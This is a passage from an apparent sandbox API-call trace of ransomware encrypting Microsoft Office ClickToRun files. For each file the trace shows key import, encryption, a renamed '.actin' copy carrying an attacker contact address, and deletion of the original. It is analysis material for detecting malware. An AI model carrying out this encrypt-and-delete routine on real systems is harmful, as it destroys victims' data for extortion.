shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0145.400] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0145.400] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0145.400] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0145.400] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac33f0) returned 1 [0145.400] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0145.400] ReadFile (in: hFile=0x2f8, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x514a8, lpOverlapped=0x0) returned 1 [0145.408] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x514b0, dwBufLen=0x514b0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x514b0) returned 1 [0145.408] WriteFile (in: hFile=0x304, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x514b0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x514b0, lpOverlapped=0x0) returned 1 [0145.414] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3470) returned 1 [0145.414] CryptSetKeyParam (hKey=0xac3470, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0145.414] CryptEncrypt (in: hKey=0xac3470, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0145.414] CryptDestroyKey (hKey=0xac3470) returned 1 [0145.414] WriteFile (in: hFile=0x304, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0145.415] CryptDestroyKey (hKey=0xac33f0) returned 1 [0145.415] CloseHandle (hObject=0x2f8) returned 1 [0145.415] CloseHandle (hObject=0x304) returned 1 [0145.415] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll")) returned 1 [0145.418] SetEvent (hEvent=0x288) returned 1 [0145.418] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0145.418] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0145.419] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=102) returned 1 [0145.419] CloseHandle (hObject=0x304) returned 1 [0145.419] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash")) returned 0x20 [0145.419] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0145.419] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0145.419] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0145.419] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0145.419] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0145.419] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac33f0) returned 1 [0145.419] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0145.420] ReadFile (in: hFile=0x304, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x66, lpOverlapped=0x0) returned 1 [0145.421] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x70, dwBufLen=0x70 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x70) returned 1 [0145.421] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x70, lpOverlapped=0x0) returned 1 [0145.422] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3070) returned 1 [0145.422] CryptSetKeyParam (hKey=0xac3070, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0145.422] CryptEncrypt (in: hKey=0xac3070, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0145.422] CryptDestroyKey (hKey=0xac3070) returned 1 [0145.422] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0145.422] CryptDestroyKey (hKey=0xac33f0) returned 1 [0145.422] CloseHandle (hObject=0x304) returned 1 [0145.422] CloseHandle (hObject=0x2f8) returned 1 [0145.422] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash")) returned 1 [0145.423] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0145.423] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0145.423] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=102) returned 1 [0145.423] CloseHandle (hObject=0x2f8) returned 1 [0145.423] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash")) returned 0x20 [0145.424] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0145.424] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0145.424] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0145.424] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0145.424] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0145.424] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3270) returned 1 [0145.424] CryptSetKeyParam (hKey=0xac3270, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0145.424] ReadFile (in: hFile=0x2f8, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x66, lpOverlapped=0x0) returned 1 [0145.425] CryptEncrypt (in: hKey=0xac3270, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x70, dwBufLen=0x70 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x70) returned 1 [0145.425] WriteFile (in: hFile=0x304, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x70, lpOverlapped=0x0) returned 1 [0145.428] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac33f0) returned 1 [0145.428] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0145.428] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0145.428] CryptDestroyKey (hKey=0xac33f0) returned 1 [0145.428] WriteFile (in: hFile=0x304, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0145.428] CryptDestroyKey (hKey=0xac3270) returned 1 [0145.428] CloseHandle (hObject=0x2f8) returned 1 [0145.428] CloseHandle (hObject=0x304) returned 1 [0145.429] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash")) returned 1 [0145.430] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0145.430] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0145.430] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=1093248) returned 1 [0145.430] CloseHandle (hObject=0x304) returned 1 [0145.430] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe")) returned 0x20 [0145.430] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0145.430] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0145.430] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0145.430] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0145.430] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0145.431] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2e30) returned 1 [0145.431] CryptSetKeyParam (hKey=0xac2e30, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x304, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x10ae80, lpOverlapped=0x0) returned 1 [0145.665] CryptEncrypt (in: hKey=0xac2e30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x10ae90, dwBufLen=0x10ae90 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x10ae90) returned 1 [0145.666] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x10ae90, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x10ae90, lpOverlapped=0x0) returned 1 [0145.908] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac34b0) returned 1 [0145.908] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0145.908] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50, dwBufLen=0x50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50) returned 1 [0145.908] CryptDestroyKey (hKey=0xac34b0) returned 1 [0145.908] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x102, lpOverlapped=0x0) returned 1 [0145.908] CryptDestroyKey (hKey=0xac2e30) returned 1 [0145.908] CloseHandle (hObject=0x304) returned 1 [0145.908] CloseHandle (hObject=0x2f8) returned 1 [0146.077] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe")) returned 1 [0146.078] SetEvent (hEvent=0x288) returned 1 [0146.079] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.079] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0146.079] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=2776664) returned 1 [0146.079] CloseHandle (hObject=0x2e4) returned 1 [0146.079] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe")) returned 0x20 [0146.079] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0146.081] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.082] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe")) returned 1 [0146.082] SetEvent (hEvent=0x288) returned 1 [0146.082] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.082] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0146.083] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=4782) returned 1 [0146.083] CloseHandle (hObject=0x2e4) returned 1 [0146.083] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml")) returned 0x20 [0146.083] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.083] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0146.083] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0146.083] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0146.083] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.084] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2df0) returned 1 [0146.084] CryptSetKeyParam (hKey=0xac2df0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0146.084] ReadFile (in: hFile=0x2e4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x12ae, lpOverlapped=0x0) returned 1 [0146.085] CryptEncrypt (in: hKey=0xac2df0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x12b0, dwBufLen=0x12b0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x12b0) returned 1 [0146.085] WriteFile (in: hFile=0x304, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x12b0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x12b0, lpOverlapped=0x0) returned 1 [0146.086] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac34b0) returned 1 [0146.086] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0146.086] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60, dwBufLen=0x60 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60) returned 1 [0146.086] CryptDestroyKey (hKey=0xac34b0) returned 1 [0146.086] WriteFile (in: hFile=0x304, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x112, lpOverlapped=0x0) returned 1 [0146.087] CryptDestroyKey (hKey=0xac2df0) returned 1 [0146.087] CloseHandle (hObject=0x2e4) returned 1 [0146.087] CloseHandle (hObject=0x304) returned 1 [0146.087] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml")) returned 1 [0146.088] SetEvent (hEvent=0x288) returned 1 [0146.088] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.088] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.088] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=4450) returned 1 [0146.088] CloseHandle (hObject=0x304) returned 1 [0146.091] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml")) returned 0x20 [0146.091] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.091] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.091] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0146.091] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0146.091] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft 